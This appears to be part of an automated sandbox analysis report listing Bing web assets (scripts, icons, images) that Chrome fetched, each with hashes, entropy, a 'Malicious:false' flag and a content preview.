                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):616
                                                                                                      Entropy (8bit):7.431744986765121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7iQ/GqTbNNfx577z3+H6vaoqaCe7Ng/O/YSe+hiRhDfCGfZWQbHEp:xYNfx977+H6vWaDJgW/Y5+hiRU4dEp
                                                                                                      MD5:63343141C64682BD3E0F711730475354
                                                                                                      SHA1:A2A7298E8F58A74292885BAE9A3F44C76C7AA945
                                                                                                      SHA-256:F90E661A7731C97E3478027D07AFD8C86E461C5F379932E15EFAD17D0E96D402
                                                                                                      SHA-512:17F7F14B0C929164283D5FD7BC829D907B923BB12A7B9D6124A6AAC64EB79AAA47163583ACCA91FC71047BB7BB707D649407801C8762D8942A44531DA9559EDF
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATXG.W.u.0.d.F`.........oF............;.v...8......$.eE1.eY.0...\.;.T@.9.. ..Hv...Z...UN.i$.|.Z...s....4"...b.^..t6..(. ..*...1..r3v.._o....\.. .0.(D...6.g....+.1.......',.?...G..o.%..D.=w.n........".F..]..~n.UM.....f..^.g.._oE'.9:.s.-...t... Q.....z..I....!.'..Q....{...50....j1.p..|..)..V..?.U..b....A.An..9$...S|W"XZ..'`.h...B../.d....{..$p..PL7....\....D..v..F..A.......S"..Q.....W...(..M(..|.6.^.........T.....2...c9.`|...(....%...RJ.==....lnU1})M..v....l.A.>..U........$....kf.`VcD.c.-.Q..x...-1.....^.?zV.r.|......IEND.B`.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):667
                                                                                                      Entropy (8bit):5.251512275863699
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                                                      MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                                                      SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                                                      SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                                                      SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/chRhkXPE7Aab4f8A3WEJL9KYGvA.js
                                                                                                      Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):616
                                                                                                      Entropy (8bit):7.431744986765121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7iQ/GqTbNNfx577z3+H6vaoqaCe7Ng/O/YSe+hiRhDfCGfZWQbHEp:xYNfx977+H6vWaDJgW/Y5+hiRU4dEp
                                                                                                      MD5:63343141C64682BD3E0F711730475354
                                                                                                      SHA1:A2A7298E8F58A74292885BAE9A3F44C76C7AA945
                                                                                                      SHA-256:F90E661A7731C97E3478027D07AFD8C86E461C5F379932E15EFAD17D0E96D402
                                                                                                      SHA-512:17F7F14B0C929164283D5FD7BC829D907B923BB12A7B9D6124A6AAC64EB79AAA47163583ACCA91FC71047BB7BB707D649407801C8762D8942A44531DA9559EDF
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATXG.W.u.0.d.F`.........oF............;.v...8......$.eE1.eY.0...\.;.T@.9.. ..Hv...Z...UN.i$.|.Z...s....4"...b.^..t6..(. ..*...1..r3v.._o....\.. .0.(D...6.g....+.1.......',.?...G..o.%..D.=w.n........".F..]..~n.UM.....f..^.g.._oE'.9:.s.-...t... Q.....z..I....!.'..Q....{...50....j1.p..|..)..V..?.U..b....A.An..9$...S|W"XZ..'`.h...B../.d....{..$p..PL7....\....D..v..F..A.......S"..Q.....W...(..M(..|.6.^.........T.....2...c9.`|...(....%...RJ.==....lnU1})M..v....l.A.>..U........$....kf.`VcD.c.-.Q..x...-1.....^.?zV.r.|......IEND.B`.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):824
                                                                                                      Entropy (8bit):5.3314854117420465
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                                                      MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                                                      SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                                                      SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                                                      SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/_cTVIwHRhwQtCi8TbO7ywAXcu4s.js
                                                                                                      Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8383), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):8393
                                                                                                      Entropy (8bit):5.429817497138933
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:R56BosBH7xOudakLR9yyfbnX77ZlhDcJU/s2:R5sNcudxLRLfbnXfZ/cJE
                                                                                                      MD5:DCA436B5A9C5D38DF576E2EF74529EC8
                                                                                                      SHA1:F00D1CAA4C586AAE3A5B280CE4C7B94FA9B6C927
                                                                                                      SHA-256:F360CF7657EB23822810E0936B125E0E35350A9DA69FB32F70EE83642CA02011
                                                                                                      SHA-512:C20AA453F4DCAB6C148EDD594A27D17CC99F8D61A15F1A1FA0C18CB2CDE765BFC26919FC9936B8E3D2600872DDD6BAF441E587B88C413B32B2F3F41F8D843A8E
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/8A0cqkxYaq46WygM5Me5T6m2ySc.js
                                                                                                      Preview:var MobileIcon;(function(){function sr(){st()?(it("Overlap"),s("Overlap")):ti("ResizeShow")}function st(){return(et===null||et===void 0?void 0:et.offsetWidth)-((ut===null||ut===void 0?void 0:ut.offsetWidth)+(ft===null||ft===void 0?void 0:ft.offsetWidth)+pt)<li}function o(){h("ClickPage");s("ClickPage")}function gt(t){t.key==="Escape"&&(p||tt)&&(n&&n.focus(),h("EscapeKeydown"),s("EscapeKeydown"))}function hr(){var n;(n=_w.localStorage)===null||n===void 0?void 0:n.setItem(pi,"true")}function ni(n){Log.Log("Click","MobileIconV2","GetApp");Log.Log(r,t,"ClickPanel");n.stopPropagation();_w.open(u,"blank")}function ti(i){n&&bt&&(Lib.CssClass.remove(n,"b_hide"),Log.Log(r,t,hi,!1,"reason",i))}function it(i){n&&Lib.CssClass.add(n,"b_hide");Log.Log(r,t,"HideIcon",!1,"reason",i)}function ht(i){if(!kt){cr(!1);return}if(Log.Log(r,t,"ShowPanel",!1,"reason",i),!dt&&_w.QRCode&&u.length){var f=_qs("#id_mobqrimg");f&&(new _w.QRCode(f,{text:u,width:84,height:84,correctLevel:1}),dt=!0)}fi();dr();n&&Lib.Css
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):838
                                                                                                      Entropy (8bit):5.10179630103155
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                                                      MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                                                      SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                                                      SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                                                      SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                                                      Malicious:false
                                                                                                      Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (511), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):511
                                                                                                      Entropy (8bit):4.980041296618112
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:yWF4eguIWKvU9bEMsR5OErixCvJO1Vi5rgsM:LF4mKctEMYOK4CvJUVYM
                                                                                                      MD5:D6741608BA48E400A406ACA7F3464765
                                                                                                      SHA1:8961CA85AD82BB701436FFC64642833CFBAFF303
                                                                                                      SHA-256:B1DB1D8C0E5316D2C8A14E778B7220AC75ADAE5333A6D58BA7FD07F4E6EAA83C
                                                                                                      SHA-512:E85360DBBB0881792B86DCAF56789434152ED69E00A99202B880F19D551B8C78EEFF38A5836024F5D61DBC36818A39A921957F13FBF592BAAFD06ACB1AED244B
                                                                                                      Malicious:false
                                                                                                      Preview:var BingAtWork;(function(n){var t;(function(n){function t(t,i){var u,r;t.isAuthenticated&&(n.raiseAuthEventAndLog(t),u=_ge("sb_form_q"),u&&(r=u.getAttribute("value"),r&&(n.fetchLowerHeader(r),n.fetchScopeBar(r),i.notifEnabled&&i.notifFetchAsync&&n.fetchNotificationConditional())))}function i(n,i){n&&n.length==2&&t(n[1],i)}n.bindToConditionalSignIn=function(n){sj_evt.bind("ssofirstquery",function(t){return i(t,n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1111
                                                                                                      Entropy (8bit):4.61511796141903
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                      MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                      SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                      SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                      SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                      Malicious:false
                                                                                                      Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:GIF image data, version 89a, 66 x 82
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):10773
                                                                                                      Entropy (8bit):7.6895795306962915
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:yKvFlvcKod4N5cy7IRZu6ZIliz8Nk3R8MV2jpHBEl67/W7w:NPpodG5cyp+VCBe+/aw
                                                                                                      MD5:F01413D3D4C1B08EDB6A6FB423A52B6C
                                                                                                      SHA1:D70C92B47396FD0C1A1BCE3B91BA909CCE1B6AED
                                                                                                      SHA-256:FC94666F372DEB34DF55E91C49B055A7E938AEF531D38A4E9857EC3D31D13AEE
                                                                                                      SHA-512:C28F301BBC548975F3E9343B80AB7A2EFDB814C71103ED8E197EAB7CBD57CDC11640F31FC43B531FF892A6A9C6B96ECF2A71E82A6BEA392A5A3F83F98736D16E
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/1wyStHOW_QwaG847kbqQnM4bau0.gif
                                                                                                      Preview:GIF89aB.R.....L..M..P..Q..7..R..7..F..I..N..L..M..K..J..F..K..J..B..J..B..K..K..W..D..J..V..L..H..L..P..M..J..L..S..J..P..O..J..K..Q..K..N..K..R..F..K..K..B..I..L..K..R..L..K..K..J..L..W..M..L..M..T..J..G..M..J..O..L..K..I..S..K..H..H..I..L..O..J..L..G..D..N..G..T..M..G..V..G..M..I..K..G..O..K..O..K..J..J..J..J..K..K..K..K..K..J..J..J..b..O..J..G..J..Y..W..N..F..L..I..S..P..J..[..I..M..W..K....!.......!..xmp dataxmp.?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://ww.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about.="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM=http://ns.adobe.com/xap/1.0/mm/" xlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.6 (Macintosh)"xmpMM:InstanceID="xmp.iid:7D440496CA811EFBB5DEF6DB70FE4.33" xmpMM:DocumentID="xmp.dd:7D44042A6CA811EFBB5DEF6DB70FE433"> <xmp
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (883), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):883
                                                                                                      Entropy (8bit):5.1977042667779445
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vA4W3Idc4Wn:d/Caq+M93H5kOS3Idmn
                                                                                                      MD5:FD88C51EDB7FCFE4F8D0AA2763CEBE4A
                                                                                                      SHA1:18891AF14C4C483BAA6CB35C985C6DEBAB2D9C8A
                                                                                                      SHA-256:51F58A23F7723B6CBD51B994CB784FBC2A4AB58442ADAEDA6C778F648073B699
                                                                                                      SHA-512:FFE417FA00113273FE7AC1B1BD83C98A3A9DC12D41C77B60C52CC5FFD461D9CA2020C2444AC43771D737C70C58ECA40786A5C5762B60F30DA523F709684510DF
                                                                                                      Malicious:false
                                                                                                      Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):964
                                                                                                      Entropy (8bit):4.421237058266115
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                      MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                      SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                      SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                      SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                      Malicious:false
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (812), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):812
                                                                                                      Entropy (8bit):4.986458196577728
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5HBnpbUAVNCUfT5eTmiHFmCvHFs9CFH/Ev18dRokVHd:5dRjKhSirOc1/k13y
                                                                                                      MD5:6A6A1291533F6BA2D08800CDE3D936C3
                                                                                                      SHA1:634EC182826760B335E20CB5EC466F3728F57775
                                                                                                      SHA-256:8C038777AA2043D5AA55680ABB118CF9A266D7B059F242589A6300F83C4BD179
                                                                                                      SHA-512:992BF911B3EDD7C630018954F94B28950B574C004F82F30332DB38D5172DD996E5A63645203DC42665990351AEC61086FDFB188248AAD1771C2A830BDB882076
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/Y07BgoJnYLM14gy17EZvNyj1d3U.js
                                                                                                      Preview:var HoverZoomin;(function(n){function f(n,t){var r=document.querySelectorAll(n),u,i;if(r)for(u=function(n){var i=r[n],u;if(!i)return"continue";u=t?i.querySelectorAll(t):null;sj_be(i,"mouseenter",function(){return e(i,u)});sj_be(i,"mouseleave",function(){return o(i,u)})},i=0;i<r.length;i++)u(i)}function e(n,f){t===undefined&&(r(),t=setInterval(function(){var e=s(.1*i,1,u),t,o;if(f)for(t=0;t<f.length;t++)o=f[t],o&&(o.style.transform="scale(".concat(e,")"));else n.style.transform="scale(".concat(e,")");i++;e>=u&&r()},1e3/30))}function o(n,t){var i,u;if(r(),t)for(i=0;i<t.length;i++)u=t[i],u&&(u.style.transform="");else n.style.transform=""}function s(n,t,i){return t+(.5-Math.cos(n*Math.PI)/2)*(i-t)}function r(){clearInterval(t);t=undefined;i=1}var t,i=1,u=1.1;n.bindHover=f})(HoverZoomin||(HoverZoomin={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):606
                                                                                                      Entropy (8bit):5.268639530160161
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                                                      MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                                                      SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                                                      SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                                                      SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                                                      Malicious:false
                                                                                                      Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (19606), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):19606
                                                                                                      Entropy (8bit):5.328636903483663
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:3Wsj/9Npzk8fbw3QMXmwOAahGvyBJeXiOOF24eeApyfYRxW+:3z/PpzkLXmw0onXi9F24Cpw43
                                                                                                      MD5:5CD7E9EC89646C664E189CA7BB2A9841
                                                                                                      SHA1:C662DD49F63A3A8C8D6F1AE4309FABB0965A9797
                                                                                                      SHA-256:AD87E00CA1F7A028F7F972199CE9B2B978306C5048EF90802F08BC17EA90A9ED
                                                                                                      SHA-512:DCF14925578A125109054B471A7006A41C98FEF2843DCD4DBD9BD8FFDB4C0802488ED98CF0BD9863A7CFF48C32C1BE73C56097452FF4482D64D7E42B12A09E0F
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/rp/xmLdSfY6OoyNbxrkMJ-rsJZal5c.js
                                                                                                      Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (918), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):918
                                                                                                      Entropy (8bit):5.212381384143468
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                                                      MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                                                      SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                                                      SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                                                      SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/Elj9SKh02Ay2Nb5FT55AI6DffEk.js
